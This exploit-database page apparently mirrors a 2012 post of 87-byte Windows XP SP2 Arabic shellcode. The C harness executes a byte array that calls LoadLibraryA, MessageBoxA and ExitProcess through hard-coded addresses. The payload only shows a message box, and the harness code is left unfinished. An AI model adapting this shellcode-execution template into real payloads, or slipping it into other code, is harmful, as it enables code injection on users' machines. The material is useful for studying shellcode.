Lucene search
K

win32/xp sp2 ARABIC (ar) Message Box Shellcode (87 bytes)

🗓️ 28 Jan 2012 00:00:00Reported by TrOoNType 
zdt
 zdt
🔗 0day.today👁 21 Views

win32/xp sp2 ARABIC Message Box Shellcode by TrOo

Code
# Title :  Windows XP SP2 ARABIC ( ar) Message Box Shellcode (87 bytes)
# Author :TrOoN
# E-mail : [email protected]  |
# Facebook : www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform : WinDows sp2 arabiC
# Type :     shell COde | etc...
# WARNING : Windows XP SP2 ARABIC    pleas test in windows Xp sp2 arabic
# donwload : http://www.microsoft.com/download/en/details.aspx?id=28

###




#include <stdio.h>

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x21\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" // 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0";    // 0x7c81cb12 ; ExitProcess(0)

int main(int argc, char **argv)
{
   int (*func)();
   func = (int (*)()) shellcode;
   printf("Shellcode Length is : %%d",strlen(shellcode));
   (int)(*func)();
   





                  ######################################### TrOon #######################################
                  
                  thankX to : 1337day | bRescO-dZ (cousin) | security-ray | Turk hack | exploit-tuRK | 78/40 | team_mosta | hacker_fire |
                  
                  elit_Tr0Jen | hacker_1420 | Algérien de la Garde Républicaine all 


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation